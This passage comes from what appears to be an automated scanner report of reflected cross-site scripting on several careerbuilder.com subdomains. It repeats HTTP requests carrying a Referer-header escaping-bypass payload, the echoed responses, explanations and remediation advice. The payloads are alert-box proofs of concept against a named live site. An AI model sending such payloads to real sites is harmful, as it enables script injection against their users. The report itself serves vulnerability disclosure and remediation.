Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /co.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh033 HTTP/1.1
Host: college.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=9dc0a\'%3balert(1)//a91ce667363
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42270
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=b59a2b8ee0ae4555bee231b0664acd74-343070679-XE-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B94473CF7DE94E8892DC5825580DC9CCCD185D5AE9D0133B629A1425E23712AD8659D87E7028C181; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:39 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR45
Date: Sun, 14 Nov 2010 22:24:39 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... s_cb.server='college'; s_cb.eVar8='college.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 9dc0a\\';alert(1)//a91ce667363'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 64fda\'%3balert(1)//4ed77ff58f2 was submitted in the Referer HTTP header. This input was echoed as 64fda\\';alert(1)//4ed77ff58f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /co.ic/Florida_Miami/ HTTP/1.1
Host: college.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=64fda\'%3balert(1)//4ed77ff58f2
Response
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42270
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=4fb5d2d35edf40349a3ae728939a92bb-343070669-XC-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650634FC20916C086ED28CFCFE684229947FE24D274F63DFE59978DD77522C40A9A6E4DC01E731063AB; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:24:28 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: BEAR43
Date: Sun, 14 Nov 2010 22:24:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... s_cb.server='college'; s_cb.eVar8='college.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 64fda\\';alert(1)//4ed77ff58f2'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46371\'%3balert(1)//92b296703fd was submitted in the Referer HTTP header. This input was echoed as 46371\\';alert(1)//92b296703fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /cs.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh035 HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=46371\'%3balert(1)//92b296703fd
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 177114
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=fa67f46c03f54f6f9dd76a05c288ab92-343070843-RF-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65097B7B523B2CD453F1F6DB0DD92B6C999C373686678288AF29248C535BC94AE3D440C6CDA795A3C13; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:23 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:23 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL15
Date: Sun, 14 Nov 2010 22:27:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 46371\\';alert(1)//92b296703fd'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f69bb\'%3balert(1)//05bdad76920 was submitted in the Referer HTTP header. This input was echoed as f69bb\\';alert(1)//05bdad76920 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /cs.ic/Florida_Miami/ HTTP/1.1
Host: customer-service.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=f69bb\'%3balert(1)//05bdad76920
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 177395
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=6a19060872854c8db7978491c000287a-343070711-VK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6502D8013EFC7A0519483CBFCEAA165ECC72D0AF4E41AE79EDFA9F9CB6364A37007EC36F90FCBB0C975; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:25:10 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:40:10 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL32
Date: Sun, 14 Nov 2010 22:25:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - f69bb\\';alert(1)//05bdad76920'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9605\'%3balert(1)//cb2b0ee2b59 was submitted in the Referer HTTP header. This input was echoed as c9605\\';alert(1)//cb2b0ee2b59 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh037 HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c9605\'%3balert(1)//cb2b0ee2b59
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 178931
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=a14aa328431d4a2894ea19c923e14acb-343070961-R0-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6505650FD3B34C836BE61CFE4ECC18EF755B35148D8AFD36EA30193A69891746B88916339BA5E7CF03B; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:20 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 22:29:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - c9605\\';alert(1)//cb2b0ee2b59'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf320\'%3balert(1)//7b08174fe63 was submitted in the Referer HTTP header. This input was echoed as bf320\\';alert(1)//7b08174fe63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /en.ic/Florida_Miami/ HTTP/1.1
Host: engineering.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=bf320\'%3balert(1)//7b08174fe63
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 178984
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d72f43f572b24972b2efa52f4a28eefa-343070775-R0-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650C934439C4FEBB9F3697A70ACC4A30F89BC587D99E7FCB86F0466BD79DE0F675097DE1E848F2627BE; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:26:14 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:41:14 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL10
Date: Sun, 14 Nov 2010 22:26:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - bf320\\';alert(1)//7b08174fe63'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad8f2\'%3balert(1)//7e60a15d1a0 was submitted in the Referer HTTP header. This input was echoed as ad8f2\\';alert(1)//7e60a15d1a0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ex.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh038 HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ad8f2\'%3balert(1)//7e60a15d1a0
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182208
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=285e7bc95bcf4765ac323d1f3a5cd566-343070978-w8-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650563CAEFB6F49013C68D48654BAB97E6714F1ED96F756EC007C80FD378BB3C502B2BA22B7D0E6ACC9; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:38 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:39 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sun, 14 Nov 2010 22:29:38 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ad8f2\\';alert(1)//7e60a15d1a0'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27deb\'%3balert(1)//c82a10adf34 was submitted in the Referer HTTP header. This input was echoed as 27deb\\';alert(1)//c82a10adf34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /ex.ic/Florida_Miami/ HTTP/1.1
Host: executive.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=27deb\'%3balert(1)//c82a10adf34
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 182490
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=943d9a01a3bd49ffbe22b15c1fecb4bc-343070823-wh-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65013830758431F9142C99B2D471F8399A9D3BF99BA5FBD7D4CB68BB4C033B9B7038DD53EC9DE66149D; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:02 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:42:03 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR18
Date: Sun, 14 Nov 2010 22:27:02 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 27deb\\';alert(1)//c82a10adf34'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cbbd\'%3balert(1)//4db0c04994f was submitted in the Referer HTTP header. This input was echoed as 6cbbd\\';alert(1)//4db0c04994f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /gv.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh093 HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6cbbd\'%3balert(1)//4db0c04994f
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170307
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=1ff0a70ddaa14b46b98770647b278c59-343071057-wk-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6500BD0804081CEC41F23692E748750E554184C223359C7DC58908A2F8A68C7BA4E516838FCE395886D; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR21
Date: Sun, 14 Nov 2010 22:30:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 6cbbd\\';alert(1)//4db0c04994f'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f16e\'%3balert(1)//9166255ca83 was submitted in the Referer HTTP header. This input was echoed as 7f16e\\';alert(1)//9166255ca83 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /gv.ic/Florida_Miami/ HTTP/1.1
Host: gov.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7f16e\'%3balert(1)//9166255ca83
Response
